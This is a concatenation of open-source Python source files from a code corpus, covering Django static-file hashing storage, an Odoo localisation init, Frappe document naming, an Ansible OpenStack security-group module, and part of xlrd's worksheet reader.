if urlsplit(clean_name).path.endswith('/'): # don't hash paths
hashed_name = name
else:
cache_key = self.cache_key(name)
hashed_name = self.cache.get(cache_key)
if hashed_name is None:
hashed_name = self.hashed_name(clean_name).replace('\\', '/')
# set the cache if there was a miss
# (e.g. if cache server goes down)
self.cache.set(cache_key, hashed_name)
final_url = super(CachedFilesMixin, self).url(hashed_name)
# Special casing for a @font-face hack, like url(myfont.eot?#iefix")
# http://www.fontspring.com/blog/the-new-bulletproof-font-face-syntax
query_fragment = '?#' in name # [sic!]
if fragment or query_fragment:
urlparts = list(urlsplit(final_url))
if fragment and not urlparts[4]:
urlparts[4] = fragment
if query_fragment and not urlparts[3]:
urlparts[2] += '?'
final_url = urlunsplit(urlparts)
return unquote(final_url)
def url_converter(self, name):
"""
Returns the custom URL converter for the given file name.
"""
def converter(matchobj):
"""
Converts the matched URL depending on the parent level (`..`)
and returns the normalized and hashed URL using the url method
of the storage.
"""
matched, url = matchobj.groups()
# Completely ignore http(s) prefixed URLs,
# fragments and data-uri URLs
if url.startswith(('#', 'http:', 'https:', 'data:')):
return matched
name_parts = name.split(os.sep)
# Using posix normpath here to remove duplicates
url = posixpath.normpath(url)
url_parts = url.split('/')
parent_level, sub_level = url.count('..'), url.count('/')
if url.startswith('/'):
sub_level -= 1
url_parts = url_parts[1:]
if parent_level or not url.startswith('/'):
start, end = parent_level + 1, parent_level
else:
if sub_level:
if sub_level == 1:
parent_level -= 1
start, end = parent_level, 1
else:
start, end = 1, sub_level - 1
joined_result = '/'.join(name_parts[:-start] + url_parts[end:])
hashed_url = self.url(unquote(joined_result), force=True)
file_name = hashed_url.split('/')[-1:]
relative_url = '/'.join(url.split('/')[:-1] + file_name)
# Return the hashed version to the file
return 'url("%s")' % unquote(relative_url)
return converter
def post_process(self, paths, dry_run=False, **options):
"""
Post process the given list of files (called from collectstatic).
Processing is actually two separate operations:
1. renaming files to include a hash of their content for cache-busting,
and copying those files to the target storage.
2. adjusting files which contain references to other files so they
refer to the cache-busting filenames.
If either of these are performed on a file, then that file is considered
post-processed.
"""
# don't even dare to process the files if we're in dry run mode
if dry_run:
return
# where to store the new paths
hashed_paths = {}
# build a list of adjustable files
matches = lambda path: matches_patterns(path, self._patterns.keys())
adjustable_paths = [path for path in paths if matches(path)]
# then sort the files by the directory level
path_level = lambda name: len(name.split(os.sep))
for name in sorted(paths.keys(), key=path_level, reverse=True):
# use the original, local file, not the copied-but-unprocessed
# file, which might be somewhere far away, like S3
storage, path = paths[name]
with storage.open(path) as original_file:
# generate the hash with the original content, even for
# adjustable files.
hashed_name = self.hashed_name(name, original_file)
# then get the original's file content..
if hasattr(original_file, 'seek'):
original_file.seek(0)
hashed_file_exists = self.exists(hashed_name)
processed = False
# ..to apply each replacement pattern to the content
if name in adjustable_paths:
content = original_file.read()
converter = self.url_converter(name)
for patterns in self._patterns.values():
for pattern in patterns:
content = pattern.sub(converter, content)
if hashed_file_exists:
self.delete(hashed_name)
# then save the processed result
content_file = ContentFile(smart_str(content))
saved_name = self._save(hashed_name, content_file)
hashed_name = force_unicode(saved_name.replace('\\', '/'))
processed = True
else:
# or handle the case in which neither processing nor
# a change to the original file happened
if not hashed_file_exists:
processed = True
saved_name = self._save(hashed_name, original_file)
hashed_name = force_unicode(saved_name.replace('\\', '/'))
# and then set the cache accordingly
hashed_paths[self.cache_key(name)] = hashed_name
yield name, hashed_name, processed
# Finally set the cache
self.cache.set_many(hashed_paths)
class CachedStaticFilesStorage(CachedFilesMixin, StaticFilesStorage):
"""
A static file system storage backend which also saves
hashed copies of the files it saves.
"""
pass
class AppStaticStorage(FileSystemStorage):
"""
A file system storage backend that takes an app module and works
for the ``static`` directory of it.
"""
prefix = None
source_dir = 'static'
def __init__(self, app, *args, **kwargs):
"""
Returns a static file storage if available in the given app.
"""
# app is the actual app module
mod = import_module(app)
mod_path = os.path.dirname(mod.__file__)
location = os.path.join(mod_path, self.source_dir)
super(AppStaticStorage, self).__init__(location, *args, **kwargs)
class ConfiguredStorage(LazyObject):
def _setup(self):
self._wrapped = get_storage_class(settings.STATICFILES_STORAGE)()
staticfiles_storage = ConfiguredStorage()
| bsd-3-clause |
erkrishna9/odoo | addons/l10n_br/__init__.py | 430 | 1403 | # -*- encoding: utf-8 -*-
###############################################################################
# #
# Copyright (C) 2009 Renato Lima - Akretion #
# #
#This program is free software: you can redistribute it and/or modify #
#it under the terms of the GNU Affero General Public License as published by #
#the Free Software Foundation, either version 3 of the License, or #
#(at your option) any later version. #
# #
#This program is distributed in the hope that it will be useful, #
#but WITHOUT ANY WARRANTY; without even the implied warranty of #
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
#GNU General Public License for more details. #
# #
#You should have received a copy of the GNU General Public License #
#along with this program. If not, see <http://www.gnu.org/licenses/>. #
###############################################################################
import account
| agpl-3.0 |
suyashphadtare/propshikhari-frappe | frappe/model/naming.py | 6 | 5881 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import now_datetime, cint
def set_new_name(doc):
"""Sets the `name`` property for the document based on various rules.
1. If amened doc, set suffix.
3. If `autoname` method is declared, then call it.
4. If `autoname` property is set in the DocType (`meta`), then build it using the `autoname` property.
2. If `name` is already defined, use that name
5. If no rule defined, use hash.
#### Note:
:param doc: Document to be named."""
doc.run_method("before_naming")
autoname = frappe.get_meta(doc.doctype).autoname
if getattr(doc, "amended_from", None):
_set_amended_name(doc)
return
elif getattr(doc.meta, "issingle", False):
doc.name = doc.doctype
elif hasattr(doc, "autoname"):
doc.run_method("autoname")
elif autoname:
if autoname.startswith('field:'):
fieldname = autoname[6:]
doc.name = (doc.get(fieldname) or "").strip()
if not doc.name:
frappe.throw(_("{0} is required").format(doc.meta.get_label(fieldname)))
raise Exception, 'Name is required'
if autoname.startswith("naming_series:"):
set_name_by_naming_series(doc)
elif "#" in autoname:
doc.name = make_autoname(autoname)
elif autoname=='Prompt':
# set from __newname in save.py
if not doc.name:
frappe.throw(_("Name not set via Prompt"))
if not doc.name:
doc.name = make_autoname('hash', doc.doctype)
doc.name = validate_name(doc.doctype, doc.name)
def set_name_by_naming_series(doc):
"""Sets name by the `naming_series` property"""
if not doc.naming_series:
doc.naming_series = get_default_naming_series(doc.doctype)
if not doc.naming_series:
frappe.throw(frappe._("Naming Series mandatory"))
doc.name = make_autoname(doc.naming_series+'.#####')
def make_autoname(key, doctype=''):
"""
Creates an autoname from the given key:
**Autoname rules:**
* The key is separated by '.'
* '####' represents a series. The string before this part becomes the prefix:
Example: ABC.#### creates a series ABC0001, ABC0002 etc
* 'MM' represents the current month
* 'YY' and 'YYYY' represent the current year
*Example:*
* DE/./.YY./.MM./.##### will create a series like
DE/09/01/0001 where 09 is the year, 01 is the month and 0001 is the series
"""
if key=="hash":
return frappe.generate_hash(doctype, 10)
if not "#" in key:
key = key + ".#####"
elif not "." in key:
frappe.throw(_("Invalid naming series (. missing)") + (_(" for {0}").format(doctype) if doctype else ""))
n = ''
l = key.split('.')
series_set = False
today = now_datetime()
for e in l:
en = ''
if e.startswith('#'):
if not series_set:
digits = len(e)
en = getseries(n, digits, doctype)
series_set = True
elif e=='YY':
en = today.strftime('%y')
elif e=='MM':
en = today.strftime('%m')
elif e=='DD':
en = today.strftime("%d")
elif e=='YYYY':
en = today.strftime('%Y')
else: en = e
n+=en
return n
def getseries(key, digits, doctype=''):
# series created ?
current = frappe.db.sql("select `current` from `tabSeries` where name=%s for update", (key,))
if current and current[0][0] is not None:
current = current[0][0]
# yes, update it
frappe.db.sql("update tabSeries set current = current+1 where name=%s", (key,))
current = cint(current) + 1
else:
# no, create it
frappe.db.sql("insert into tabSeries (name, current) values (%s, 1)", (key,))
current = 1
return ('%0'+str(digits)+'d') % current
def revert_series_if_last(key, name):
if ".#" in key:
prefix, hashes = key.rsplit(".", 1)
if "#" not in hashes:
return
else:
prefix = key
count = cint(name.replace(prefix, ""))
current = frappe.db.sql("select `current` from `tabSeries` where name=%s for update", (prefix,))
if current and current[0][0]==count:
frappe.db.sql("update tabSeries set current=current-1 where name=%s", prefix)
def get_default_naming_series(doctype):
"""get default value for `naming_series` property"""
naming_series = frappe.get_meta(doctype).get_field("naming_series").options or ""
if naming_series:
naming_series = naming_series.split("\n")
return naming_series[0] or naming_series[1]
else:
return None
def validate_name(doctype, name, case=None, merge=False):
if not name: return 'No Name Specified for %s' % doctype
if name.startswith('New '+doctype):
frappe.throw(_('There were some errors setting the name, please contact the administrator'), frappe.NameError)
if case=='Title Case': name = name.title()
if case=='UPPER CASE': name = name.upper()
name = name.strip()
if not frappe.get_meta(doctype).get("issingle") and (doctype == name) and (name!="DocType"):
frappe.throw(_("Name of {0} cannot be {1}").format(doctype, name), frappe.NameError)
return name
def _set_amended_name(doc):
am_id = 1
am_prefix = doc.amended_from
if frappe.db.get_value(doc.doctype, doc.amended_from, "amended_from"):
am_id = cint(doc.amended_from.split('-')[-1]) + 1
am_prefix = '-'.join(doc.amended_from.split('-')[:-1]) # except the last hyphen
doc.name = am_prefix + '-' + str(am_id)
return doc.name
def append_number_if_name_exists(doc):
if frappe.db.exists(doc.doctype, doc.name):
last = frappe.db.sql("""select name from `tab{}`
where name regexp '^{}-[[:digit:]]+'
order by length(name) desc, name desc limit 1""".format(doc.doctype, doc.name))
if last:
count = str(cint(last[0][0].rsplit("-", 1)[1]) + 1)
else:
count = "1"
doc.name = "{0}-{1}".format(doc.name, count)
def de_duplicate(doctype, name):
original_name = name
count = 0
while True:
if frappe.db.exists(doctype, name):
count += 1
name = "{0}-{1}".format(original_name, count)
else:
break
return name
| mit |
cyberark-bizdev/ansible | lib/ansible/modules/cloud/openstack/os_security_group.py | 5 | 3968 | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2013, Benno Joy <benno@ansible.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: os_security_group
short_description: Add/Delete security groups from an OpenStack cloud.
extends_documentation_fragment: openstack
author: "Monty Taylor (@emonty)"
version_added: "2.0"
description:
- Add or Remove security groups from an OpenStack cloud.
options:
name:
description:
- Name that has to be given to the security group. This module
requires that security group names be unique.
required: true
description:
description:
- Long description of the purpose of the security group
required: false
default: None
state:
description:
- Should the resource be present or absent.
choices: [present, absent]
default: present
availability_zone:
description:
- Ignored. Present for backwards compatibility
required: false
'''
EXAMPLES = '''
# Create a security group
- os_security_group:
cloud: mordred
state: present
name: foo
description: security group for foo servers
# Update the existing 'foo' security group description
- os_security_group:
cloud: mordred
state: present
name: foo
description: updated description for the foo security group
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.openstack import openstack_full_argument_spec, openstack_module_kwargs, openstack_cloud_from_module
def _needs_update(module, secgroup):
"""Check for differences in the updatable values.
NOTE: We don't currently allow name updates.
"""
if secgroup['description'] != module.params['description']:
return True
return False
def _system_state_change(module, secgroup):
state = module.params['state']
if state == 'present':
if not secgroup:
return True
return _needs_update(module, secgroup)
if state == 'absent' and secgroup:
return True
return False
def main():
argument_spec = openstack_full_argument_spec(
name=dict(required=True),
description=dict(default=''),
state=dict(default='present', choices=['absent', 'present']),
)
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec,
supports_check_mode=True,
**module_kwargs)
name = module.params['name']
state = module.params['state']
description = module.params['description']
shade, cloud = openstack_cloud_from_module(module)
try:
secgroup = cloud.get_security_group(name)
if module.check_mode:
module.exit_json(changed=_system_state_change(module, secgroup))
changed = False
if state == 'present':
if not secgroup:
secgroup = cloud.create_security_group(name, description)
changed = True
else:
if _needs_update(module, secgroup):
secgroup = cloud.update_security_group(
secgroup['id'], description=description)
changed = True
module.exit_json(
changed=changed, id=secgroup['id'], secgroup=secgroup)
if state == 'absent':
if secgroup:
cloud.delete_security_group(secgroup['id'])
changed = True
module.exit_json(changed=changed)
except shade.OpenStackCloudException as e:
module.fail_json(msg=str(e))
if __name__ == "__main__":
main()
| gpl-3.0 |
tommo/gii | lib/3rdparty/common/xlrd/sheet.py | 29 | 107386 | # -*- coding: cp1252 -*-
##
# <p> Portions copyright © 2005-2013 Stephen John Machin, Lingfo Pty Ltd</p>
# <p>This module is part of the xlrd package, which is released under a BSD-style licence.</p>
##
# 2010-04-25 SJM fix zoom factors cooking logic
# 2010-04-15 CW r4253 fix zoom factors cooking logic
# 2010-04-09 CW r4248 add a flag so xlutils knows whether or not to write a PANE record
# 2010-03-29 SJM Fixed bug in adding new empty rows in put_cell_ragged
# 2010-03-28 SJM Tailored put_cell method for each of ragged_rows=False (fixed speed regression) and =True (faster)
# 2010-03-25 CW r4236 Slight refactoring to remove method calls
# 2010-03-25 CW r4235 Collapse expand_cells into put_cell and enhance the raggedness. This should save even more memory!
# 2010-03-25 CW r4234 remove duplicate chunks for extend_cells; refactor to remove put_number_cell and put_blank_cell which essentially duplicated the code of put_cell
# 2010-03-10 SJM r4222 Added reading of the PANE record.
# 2010-03-10 SJM r4221 Preliminary work on "cooked" mag factors; use at own peril
# 2010-03-01 SJM Reading SCL record
# 2010-03-01 SJM Added ragged_rows functionality
# 2009-08-23 SJM Reduced CPU time taken by parsing MULBLANK records.
# 2009-08-18 SJM Used __slots__ and sharing to reduce memory consumed by Rowinfo instances
# 2009-05-31 SJM Fixed problem with no CODEPAGE record on extremely minimal BIFF2.x 3rd-party file
# 2009-04-27 SJM Integrated on_demand patch by Armando Serrano Lombillo
# 2008-02-09 SJM Excel 2.0: build XFs on the fly from cell attributes
# 2007-12-04 SJM Added support for Excel 2.x (BIFF2) files.
# 2007-10-11 SJM Added missing entry for blank cell type to ctype_text
# 2007-07-11 SJM Allow for BIFF2/3-style FORMAT record in BIFF4/8 file
# 2007-04-22 SJM Remove experimental "trimming" facility.
from __future__ import print_function
from array import array
from struct import unpack, calcsize
from .biffh import *
from .timemachine import *
from .formula import dump_formula, decompile_formula, rangename2d, FMLA_TYPE_CELL, FMLA_TYPE_SHARED
from .formatting import nearest_colour_index, Format
DEBUG = 0
OBJ_MSO_DEBUG = 0
_WINDOW2_options = (
# Attribute names and initial values to use in case
# a WINDOW2 record is not written.
("show_formulas", 0),
("show_grid_lines", 1),
("show_sheet_headers", 1),
("panes_are_frozen", 0),
("show_zero_values", 1),
("automatic_grid_line_colour", 1),
("columns_from_right_to_left", 0),
("show_outline_symbols", 1),
("remove_splits_if_pane_freeze_is_removed", 0),
# Multiple sheets can be selected, but only one can be active
# (hold down Ctrl and click multiple tabs in the file in OOo)
("sheet_selected", 0),
# "sheet_visible" should really be called "sheet_active"
# and is 1 when this sheet is the sheet displayed when the file
# is open. More than likely only one sheet should ever be set as
# visible.
# This would correspond to the Book's sheet_active attribute, but
# that doesn't exist as WINDOW1 records aren't currently processed.
# The real thing is the visibility attribute from the BOUNDSHEET record.
("sheet_visible", 0),
("show_in_page_break_preview", 0),
)
##
# <p>Contains the data for one worksheet.</p>
#
# <p>In the cell access functions, "rowx" is a row index, counting from zero, and "colx" is a
# column index, counting from zero.
# Negative values for row/column indexes and slice positions are supported in the expected fashion.</p>
#
# <p>For information about cell types and cell values, refer to the documentation of the {@link #Cell} class.</p>
#
# <p>WARNING: You don't call this class yourself. You access Sheet objects via the Book object that
# was returned when you called xlrd.open_workbook("myfile.xls").</p>
class Sheet(BaseObject):
##
# Name of sheet.
name = ''
##
# A reference to the Book object to which this sheet belongs.
# Example usage: some_sheet.book.datemode
book = None
##
# Number of rows in sheet. A row index is in range(thesheet.nrows).
nrows = 0
##
# Nominal number of columns in sheet. It is 1 + the maximum column index
# found, ignoring trailing empty cells. See also open_workbook(ragged_rows=?)
# and Sheet.{@link #Sheet.row_len}(row_index).
ncols = 0
##
# The map from a column index to a {@link #Colinfo} object. Often there is an entry
# in COLINFO records for all column indexes in range(257).
# Note that xlrd ignores the entry for the non-existent
# 257th column. On the other hand, there may be no entry for unused columns.
# <br /> -- New in version 0.6.1. Populated only if open_workbook(formatting_info=True).
colinfo_map = {}
##
# The map from a row index to a {@link #Rowinfo} object. Note that it is possible
# to have missing entries -- at least one source of XLS files doesn't
# bother writing ROW records.
# <br /> -- New in version 0.6.1. Populated only if open_workbook(formatting_info=True).
rowinfo_map = {}
##
# List of address ranges of cells containing column labels.
# These are set up in Excel by Insert > Name > Labels > Columns.
# <br> -- New in version 0.6.0
# <br>How to deconstruct the list:
# <pre>
# for crange in thesheet.col_label_ranges:
# rlo, rhi, clo, chi = crange
# for rx in xrange(rlo, rhi):
# for cx in xrange(clo, chi):
# print "Column label at (rowx=%d, colx=%d) is %r" \
# (rx, cx, thesheet.cell_value(rx, cx))
# </pre>
col_label_ranges = []
##
# List of address ranges of cells containing row labels.
# For more details, see <i>col_label_ranges</i> above.
# <br> -- New in version 0.6.0
row_label_ranges = []
##
# List of address ranges of cells which have been merged.
# These are set up in Excel by Format > Cells > Alignment, then ticking
# the "Merge cells" box.
# <br> -- New in version 0.6.1. Extracted only if open_workbook(formatting_info=True).
# <br>How to deconstruct the list:
# <pre>
# for crange in thesheet.merged_cells:
# rlo, rhi, clo, chi = crange
# for rowx in xrange(rlo, rhi):
# for colx in xrange(clo, chi):
# # cell (rlo, clo) (the top left one) will carry the data
# # and formatting info; the remainder will be recorded as
# # blank cells, but a renderer will apply the formatting info
# # for the top left cell (e.g. border, pattern) to all cells in
# # the range.
# </pre>
merged_cells = []
##
# Mapping of (rowx, colx) to list of (offset, font_index) tuples. The offset
# defines where in the string the font begins to be used.
# Offsets are expected to be in ascending order.
# If the first offset is not zero, the meaning is that the cell's XF's font should
# be used from offset 0.
# <br /> This is a sparse mapping. There is no entry for cells that are not formatted with
# rich text.
# <br>How to use:
# <pre>
# runlist = thesheet.rich_text_runlist_map.get((rowx, colx))
# if runlist:
# for offset, font_index in runlist:
# # do work here.
# pass
# </pre>
# Populated only if open_workbook(formatting_info=True).
# <br /> -- New in version 0.7.2.
# <br />
rich_text_runlist_map = {}
##
# Default column width from DEFCOLWIDTH record, else None.
# From the OOo docs:<br />
# """Column width in characters, using the width of the zero character
# from default font (first FONT record in the file). Excel adds some
# extra space to the default width, depending on the default font and
# default font size. The algorithm how to exactly calculate the resulting
# column width is not known.<br />
# Example: The default width of 8 set in this record results in a column
# width of 8.43 using Arial font with a size of 10 points."""<br />
# For the default hierarchy, refer to the {@link #Colinfo} class.
# <br /> -- New in version 0.6.1
defcolwidth = None
##
# Default column width from STANDARDWIDTH record, else None.
# From the OOo docs:<br />
# """Default width of the columns in 1/256 of the width of the zero
# character, using default font (first FONT record in the file)."""<br />
# For the default hierarchy, refer to the {@link #Colinfo} class.
# <br /> -- New in version 0.6.1
standardwidth = None
##
# Default value to be used for a row if there is
# no ROW record for that row.
# From the <i>optional</i> DEFAULTROWHEIGHT record.
default_row_height = None
##
# Default value to be used for a row if there is
# no ROW record for that row.
# From the <i>optional</i> DEFAULTROWHEIGHT record.
default_row_height_mismatch = None
##
# Default value to be used for a row if there is
# no ROW record for that row.
# From the <i>optional</i> DEFAULTROWHEIGHT record.
default_row_hidden = None
##
# Default value to be used for a row if there is
# no ROW record for that row.
# From the <i>optional</i> DEFAULTROWHEIGHT record.
default_additional_space_above = None
##
# Default value to be used for a row if there is
# no ROW record for that row.
# From the <i>optional</i> DEFAULTROWHEIGHT record.
default_additional_space_below = None
##
# Visibility of the sheet. 0 = visible, 1 = hidden (can be unhidden
# by user -- Format/Sheet/Unhide), 2 = "very hidden" (can be unhidden
# only by VBA macro).
visibility = 0
##
# A 256-element tuple corresponding to the contents of the GCW record for this sheet.
# If no such record, treat as all bits zero.
# Applies to BIFF4-7 only. See docs of the {@link #Colinfo} class for discussion.
gcw = (0, ) * 256
##
# <p>A list of {@link #Hyperlink} objects corresponding to HLINK records found
# in the worksheet.<br />-- New in version 0.7.2 </p>
hyperlink_list = []
##
# <p>A sparse mapping from (rowx, colx) to an item in {@link #Sheet.hyperlink_list}.
# Cells not covered by a hyperlink are not mapped.
# It is possible using the Excel UI to set up a hyperlink that
# covers a larger-than-1x1 rectangle of cells.
# Hyperlink rectangles may overlap (Excel doesn't check).
# When a multiply-covered cell is clicked on, the hyperlink that is activated
# (and the one that is mapped here) is the last in hyperlink_list.
# <br />-- New in version 0.7.2 </p>
hyperlink_map = {}
##
# <p>A sparse mapping from (rowx, colx) to a {@link #Note} object.
# Cells not containing a note ("comment") are not mapped.
# <br />-- New in version 0.7.2 </p>
cell_note_map = {}
##
# Number of columns in left pane (frozen panes; for split panes, see comments below in code)
vert_split_pos = 0
##
# Number of rows in top pane (frozen panes; for split panes, see comments below in code)
horz_split_pos = 0
##
# Index of first visible row in bottom frozen/split pane
horz_split_first_visible = 0
##
# Index of first visible column in right frozen/split pane
vert_split_first_visible = 0
##
# Frozen panes: ignore it. Split panes: explanation and diagrams in OOo docs.
split_active_pane = 0
##
# Boolean specifying if a PANE record was present, ignore unless you're xlutils.copy
has_pane_record = 0
##
# A list of the horizontal page breaks in this sheet.
# Breaks are tuples in the form (index of row after break, start col index, end col index).
# Populated only if open_workbook(formatting_info=True).
# <br /> -- New in version 0.7.2
horizontal_page_breaks = []
##
# A list of the vertical page breaks in this sheet.
# Breaks are tuples in the form (index of col after break, start row index, end row index).
# Populated only if open_workbook(formatting_info=True).
# <br /> -- New in version 0.7.2
vertical_page_breaks = []
def __init__(self, book, position, name, number):
self.book = book
self.biff_version = book.biff_version
self._position = position
self.logfile = book.logfile
self.bt = array('B', [XL_CELL_EMPTY])
self.bf = array('h', [-1])
self.name = name
self.number = number
self.verbosity = book.verbosity
self.formatting_info = book.formatting_info
self.ragged_rows = book.ragged_rows
if self.ragged_rows:
self.put_cell = self.put_cell_ragged
else:
self.put_cell = self.put_cell_unragged
self._xf_index_to_xl_type_map = book._xf_index_to_xl_type_map
self.nrows = 0 # actual, including possibly empty cells
self.ncols = 0
self._maxdatarowx = -1 # highest rowx containing a non-empty cell
self._maxdatacolx = -1 # highest colx containing a non-empty cell
self._dimnrows = 0 # as per DIMENSIONS record
self._dimncols = 0
self._cell_values = []
self._cell_types = []
self._cell_xf_indexes = []
self.defcolwidth = None
self.standardwidth = None
self.default_row_height = None
self.default_row_height_mismatch = 0
self.default_row_hidden = 0
self.default_additional_space_above = 0
self.default_additional_space_below = 0
self.colinfo_map = {}
self.rowinfo_map = {}
self.col_label_ranges = []
self.row_label_ranges = []
self.merged_cells = []
self.rich_text_runlist_map = {}
self.horizontal_page_breaks = []
self.vertical_page_breaks = []
self._xf_index_stats = [0, 0, 0, 0]
self.visibility = book._sheet_visibility[number] # from BOUNDSHEET record
for attr, defval in _WINDOW2_options:
setattr(self, attr, defval)
self.first_visible_rowx = 0
self.first_visible_colx = 0
self.gridline_colour_index = 0x40
self.gridline_colour_rgb = None # pre-BIFF8
self.hyperlink_list = []
self.hyperlink_map = {}
self.cell_note_map = {}
# Values calculated by xlrd to predict the mag factors that
# will actually be used by Excel to display your worksheet.
# Pass these values to xlwt when writing XLS files.
# Warning 1: Behaviour of OOo Calc and Gnumeric has been observed to differ from Excel's.
# Warning 2: A value of zero means almost exactly what it says. Your sheet will be
# displayed as a very tiny speck on the screen. xlwt will reject attempts to set
# a mag_factor that is not (10 <= mag_factor <= 400).
self.cooked_page_break_preview_mag_factor = 60
self.cooked_normal_view_mag_factor = 100
# Values (if any) actually stored on the XLS file
self.cached_page_break_preview_mag_factor = None # from WINDOW2 record
self.cached_normal_view_mag_factor = None # from WINDOW2 record
self.scl_mag_factor = None # from SCL record
self._ixfe = None # BIFF2 only
self._cell_attr_to_xfx = {} # BIFF2.0 only
#### Don't initialise this here, use class attribute initialisation.
#### self.gcw = (0, ) * 256 ####
if self.biff_version >= 80:
self.utter_max_rows = 65536
else:
self.utter_max_rows = 16384
self.utter_max_cols = 256
self._first_full_rowx = -1
# self._put_cell_exceptions = 0
# self._put_cell_row_widenings = 0
# self._put_cell_rows_appended = 0
# self._put_cell_cells_appended = 0
##
# {@link #Cell} object in the given row and column.
def cell(self, rowx, colx):
if self.formatting_info:
xfx = self.cell_xf_index(rowx, colx)
else:
xfx = None
return Cell(
self._cell_types[rowx][colx],
self._cell_values[rowx][colx],
xfx,
)
##
# Value of the cell in the given row and column.
def cell_value(self, rowx, colx):
return self._cell_values[rowx][colx]
##
# Type of the cell in the given row and column.
# Refer to the documentation of the {@link #Cell} class.
def cell_type(self, rowx, colx):
return self._cell_types[rowx][colx]
##
# XF index of the cell in the given row and column.
# This is an index into Book.{@link #Book.xf_list}.
# <br /> -- New in version 0.6.1
def cell_xf_index(self, rowx, colx):
self.req_fmt_info()
xfx = self._cell_xf_indexes[rowx][colx]
if xfx > -1:
self._xf_index_stats[0] += 1
return xfx
# Check for a row xf_index
try:
xfx = self.rowinfo_map[rowx].xf_index
if xfx > -1:
self._xf_index_stats[1] += 1
return xfx
except KeyError:
pass
# Check for a column xf_index
try:
xfx = self.colinfo_map[colx].xf_index
if xfx == -1: xfx = 15
self._xf_index_stats[2] += 1
return xfx
except KeyError:
# If all else fails, 15 is used as hardwired global default xf_index.
self._xf_index_stats[3] += 1
return 15
##
# Returns the effective number of cells in the given row. For use with
# open_workbook(ragged_rows=True) which is likely to produce rows
# with fewer than {@link #Sheet.ncols} cells.
# <br /> -- New in version 0.7.2
def row_len(self, rowx):
return len(self._cell_values[rowx])
##
# Returns a sequence of the {@link #Cell} objects in the given row.
def row(self, rowx):
return [
self.cell(rowx, colx)
for colx in xrange(len(self._cell_values[rowx]))
]
##
# Returns a slice of the types
# of the cells in the given row.
def row_types(self, rowx, start_colx=0, end_colx=None):
if end_colx is None:
return self._cell_types[rowx][start_colx:]
return self._cell_types[rowx][start_colx:end_colx]
##
# Returns a slice of the values
# of the cells in the given row.
def row_values(self, rowx, start_colx=0, end_colx=None):
if end_colx is None:
return self._cell_values[rowx][start_colx:]
return self._cell_values[rowx][start_colx:end_colx]
##
# Returns a slice of the {@link #Cell} objects in the given row.
def row_slice(self, rowx, start_colx=0, end_colx=None):
nc = len(self._cell_values[rowx])
if start_colx < 0:
start_colx += nc
if start_colx < 0:
start_colx = 0
if end_colx is None or end_colx > nc:
end_colx = nc
elif end_colx < 0:
end_colx += nc
return [
self.cell(rowx, colx)
for colx in xrange(start_colx, end_colx)
]
##
# Returns a slice of the {@link #Cell} objects in the given column.
def col_slice(self, colx, start_rowx=0, end_rowx=None):
nr = self.nrows
if start_rowx < 0:
start_rowx += nr
if start_rowx < 0:
start_rowx = 0
if end_rowx is None or end_rowx > nr:
end_rowx = nr
elif end_rowx < 0:
end_rowx += nr
return [
self.cell(rowx, colx)
for rowx in xrange(start_rowx, end_rowx)
]
##
# Returns a slice of the values of the cells in the given column.
def col_values(self, colx, start_rowx=0, end_rowx=None):
nr = self.nrows
if start_rowx < 0:
start_rowx += nr
if start_rowx < 0:
start_rowx = 0
if end_rowx is None or end_rowx > nr:
end_rowx = nr
elif end_rowx < 0:
end_rowx += nr
return [
self._cell_values[rowx][colx]
for rowx in xrange(start_rowx, end_rowx)
]
##
# Returns a slice of the types of the cells in the given column.
def col_types(self, colx, start_rowx=0, end_rowx=None):
nr = self.nrows
if start_rowx < 0:
start_rowx += nr
if start_rowx < 0:
start_rowx = 0
if end_rowx is None or end_rowx > nr:
end_rowx = nr
elif end_rowx < 0:
end_rowx += nr
return [
self._cell_types[rowx][colx]
for rowx in xrange(start_rowx, end_rowx)
]
##
# Returns a sequence of the {@link #Cell} objects in the given column.
def col(self, colx):
return self.col_slice(colx)
# Above two lines just for the docs. Here's the real McCoy:
col = col_slice
# === Following methods are used in building the worksheet.
# === They are not part of the API.
def tidy_dimensions(self):
if self.verbosity >= 3:
fprintf(self.logfile,
"tidy_dimensions: nrows=%d ncols=%d \n",
self.nrows, self.ncols,
)
if 1 and self.merged_cells:
nr = nc = 0
umaxrows = self.utter_max_rows
umaxcols = self.utter_max_cols
for crange in self.merged_cells:
rlo, rhi, clo, chi = crange
if not (0 <= rlo < rhi <= umaxrows) \
or not (0 <= clo < chi <= umaxcols):
fprintf(self.logfile,
"*** WARNING: sheet #%d (%r), MERGEDCELLS bad range %r\n",
self.number, self.name, crange)
if rhi > nr: nr = rhi
if chi > nc: nc = chi
if nc > self.ncols:
self.ncols = nc
if nr > self.nrows:
# we put one empty cell at (nr-1,0) to make sure
# we have the right number of rows. The ragged rows
# will sort out the rest if needed.
self.put_cell(nr-1, 0, XL_CELL_EMPTY, '', -1)
if self.verbosity >= 1 \
and (self.nrows != self._dimnrows or self.ncols != self._dimncols):
fprintf(self.logfile,
"NOTE *** sheet %d (%r): DIMENSIONS R,C = %d,%d should be %d,%d\n",
self.number,
self.name,
self._dimnrows,
self._dimncols,
self.nrows,
self.ncols,
)
if not self.ragged_rows:
# fix ragged rows
ncols = self.ncols
s_cell_types = self._cell_types
s_cell_values = self._cell_values
s_cell_xf_indexes = self._cell_xf_indexes
s_fmt_info = self.formatting_info
# for rowx in xrange(self.nrows):
if self._first_full_rowx == -2:
ubound = self.nrows
else:
ubound = self._first_full_rowx
for rowx in xrange(ubound):
trow = s_cell_types[rowx]
rlen = len(trow)
nextra = ncols - rlen
if nextra > 0:
s_cell_values[rowx][rlen:] = [''] * nextra
trow[rlen:] = self.bt * nextra
if s_fmt_info:
s_cell_xf_indexes[rowx][rlen:] = self.bf * nextra
def put_cell_ragged(self, rowx, colx, ctype, value, xf_index):
if ctype is None:
# we have a number, so look up the cell type
ctype = self._xf_index_to_xl_type_map[xf_index]
assert 0 <= colx < self.utter_max_cols
